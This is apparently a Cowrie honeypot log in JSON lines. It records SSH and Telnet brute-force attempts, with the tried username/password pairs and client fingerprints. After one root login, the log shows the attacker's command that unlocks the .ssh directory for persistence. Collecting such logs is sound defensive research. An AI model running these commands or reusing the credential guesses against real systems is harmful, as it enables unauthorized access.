{"eventid":"cowrie.login.failed","username":"admin","password":"q1w2e3","message":"login attempt [admin/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:13.406472Z","src_ip":"170.64.166.123","session":"fa6949951985"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:14.688468Z","src_ip":"170.64.166.123","session":"fa6949951985"}
{"eventid":"cowrie.login.failed","username":"test1","password":"welcome","message":"login attempt [test1/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:14.952526Z","src_ip":"212.227.125.160","session":"0e1539c5d9a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"20.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 20.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:16.119353Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.session.closed","duration":"68.5","message":"Connection lost after 68.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:16.413475Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:16.491264Z","src_ip":"212.227.125.160","session":"0e1539c5d9a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58550,"dst_ip":"1.2.3.4","dst_port":22,"session":"760441329fdd","protocol":"ssh","message":"New connection: 212.227.235.229:58550 (1.2.3.4:22) [session: 760441329fdd]","sensor":"my-vps","timestamp":"2025-08-31T05:41:17.523356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:41:17.524276Z","src_ip":"212.227.235.229","session":"760441329fdd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:41:17.812224Z","src_ip":"212.227.235.229","session":"760441329fdd"}
{"eventid":"cowrie.login.failed","username":"ivan","password":"ivan","message":"login attempt [ivan/ivan] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:19.006061Z","src_ip":"212.227.235.229","session":"760441329fdd"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:20.297007Z","src_ip":"212.227.235.229","session":"760441329fdd"}
{"eventid":"cowrie.session.closed","duration":12.579547643661499,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:22.125216Z","src_ip":"212.227.125.160","session":"b9a2e0136ea4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33829,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3c68127b011","protocol":"telnet","message":"New connection: 212.227.125.160:33829 (1.2.3.4:23) [session: b3c68127b011]","sensor":"my-vps","timestamp":"2025-08-31T05:41:22.333977Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41254,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec606b026749","protocol":"ssh","message":"New connection: 212.227.235.229:41254 (1.2.3.4:22) [session: ec606b026749]","sensor":"my-vps","timestamp":"2025-08-31T05:41:32.469154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:41:32.470359Z","src_ip":"212.227.235.229","session":"ec606b026749"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T05:41:32.567673Z","src_ip":"212.227.235.229","session":"ec606b026749"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"root","message":"login attempt [odoo/root] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:32.861895Z","src_ip":"212.227.235.229","session":"ec606b026749"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:33.999020Z","src_ip":"212.227.235.229","session":"ec606b026749"}
{"eventid":"cowrie.session.closed","duration":12.781096935272217,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:35.114999Z","src_ip":"212.227.125.160","session":"b3c68127b011"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34070,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdb5d783ee37","protocol":"telnet","message":"New connection: 212.227.125.160:34070 (1.2.3.4:23) [session: cdb5d783ee37]","sensor":"my-vps","timestamp":"2025-08-31T05:41:35.344041Z"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:41.466574Z","src_ip":"212.227.125.160","session":"5ee2139f06bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54582,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a9b4d587374","protocol":"ssh","message":"New connection: 212.227.125.160:54582 (1.2.3.4:22) [session: 9a9b4d587374]","sensor":"my-vps","timestamp":"2025-08-31T05:41:47.727457Z"}
{"eventid":"cowrie.session.closed","duration":12.780551195144653,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:48.124525Z","src_ip":"212.227.125.160","session":"cdb5d783ee37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34312,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e403c9d7453","protocol":"telnet","message":"New connection: 212.227.125.160:34312 (1.2.3.4:23) [session: 1e403c9d7453]","sensor":"my-vps","timestamp":"2025-08-31T05:41:48.327419Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44994,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f070ada1c96","protocol":"ssh","message":"New connection: 212.227.235.229:44994 (1.2.3.4:22) [session: 6f070ada1c96]","sensor":"my-vps","timestamp":"2025-08-31T05:41:48.778596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:41:49.496472Z","src_ip":"212.227.235.229","session":"6f070ada1c96"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:41:49.497662Z","src_ip":"212.227.235.229","session":"6f070ada1c96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55232,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2ad90806701","protocol":"ssh","message":"New connection: 212.227.235.229:55232 (1.2.3.4:22) [session: b2ad90806701]","sensor":"my-vps","timestamp":"2025-08-31T05:41:52.004494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:41:52.005220Z","src_ip":"212.227.235.229","session":"b2ad90806701"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:41:52.287804Z","src_ip":"212.227.235.229","session":"b2ad90806701"}
{"eventid":"cowrie.login.failed","username":"root1","password":"12345","message":"login attempt [root1/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:53.459656Z","src_ip":"212.227.235.229","session":"b2ad90806701"}
{"eventid":"cowrie.session.closed","duration":"88.6","message":"Connection lost after 88.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:53.504830Z","src_ip":"212.227.125.160","session":"5ee2139f06bd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:54.743497Z","src_ip":"212.227.235.229","session":"b2ad90806701"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":61728,"dst_ip":"1.2.3.4","dst_port":22,"session":"a680446057f4","protocol":"ssh","message":"New connection: 80.94.95.15:61728 (1.2.3.4:22) [session: a680446057f4]","sensor":"my-vps","timestamp":"2025-08-31T05:41:54.975817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:41:54.976725Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:41:55.042568Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric","message":"login attempt [cedric/cedric] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:55.386261Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.login.failed","username":"test1","password":"abc123","message":"login attempt [test1/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:55.498483Z","src_ip":"212.227.235.229","session":"6f070ada1c96"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:41:55.753153Z","src_ip":"212.227.125.160","session":"9a9b4d587374"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:41:55.754139Z","src_ip":"212.227.125.160","session":"9a9b4d587374"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric1","message":"login attempt [cedric/cedric1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:56.454886Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:57.258170Z","src_ip":"212.227.235.229","session":"6f070ada1c96"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric123","message":"login attempt [cedric/cedric123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:57.522650Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric1234","message":"login attempt [cedric/cedric1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:58.590870Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric12345","message":"login attempt [cedric/cedric12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:59.659857Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:00.728804Z","src_ip":"80.94.95.15","session":"a680446057f4"}
{"eventid":"cowrie.session.closed","duration":12.778663158416748,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:01.106007Z","src_ip":"212.227.125.160","session":"1e403c9d7453"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34564,"dst_ip":"1.2.3.4","dst_port":23,"session":"69bd0e2d46d9","protocol":"telnet","message":"New connection: 212.227.125.160:34564 (1.2.3.4:23) [session: 69bd0e2d46d9]","sensor":"my-vps","timestamp":"2025-08-31T05:42:01.316223Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35020,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c6650a978b","protocol":"ssh","message":"New connection: 212.227.125.160:35020 (1.2.3.4:22) [session: 13c6650a978b]","sensor":"my-vps","timestamp":"2025-08-31T05:42:09.307619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:42:09.720105Z","src_ip":"212.227.125.160","session":"13c6650a978b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:42:09.721981Z","src_ip":"212.227.125.160","session":"13c6650a978b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53664,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6c767e11de3","protocol":"ssh","message":"New connection: 212.227.235.229:53664 (1.2.3.4:22) [session: b6c767e11de3]","sensor":"my-vps","timestamp":"2025-08-31T05:42:10.463530Z"}
{"eventid":"cowrie.login.failed","username":"test1","password":"abc123","message":"login attempt [test1/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:12.002708Z","src_ip":"212.227.125.160","session":"13c6650a978b"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":38984,"dst_ip":"1.2.3.4","dst_port":22,"session":"055a0a40c78c","protocol":"ssh","message":"New connection: 43.159.36.188:38984 (1.2.3.4:22) [session: 055a0a40c78c]","sensor":"my-vps","timestamp":"2025-08-31T05:42:12.049070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:12.049740Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:12.303033Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:12.790266Z","src_ip":"212.227.125.160","session":"9a9b4d587374"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123456","message":"login attempt [root/qwe123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:42:13.356152Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:13.636831Z","src_ip":"212.227.125.160","session":"13c6650a978b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:42:13.883526Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:42:13.884267Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:42:13.885290Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.session.closed","duration":12.788956642150879,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:14.105105Z","src_ip":"212.227.125.160","session":"69bd0e2d46d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:14.139427Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
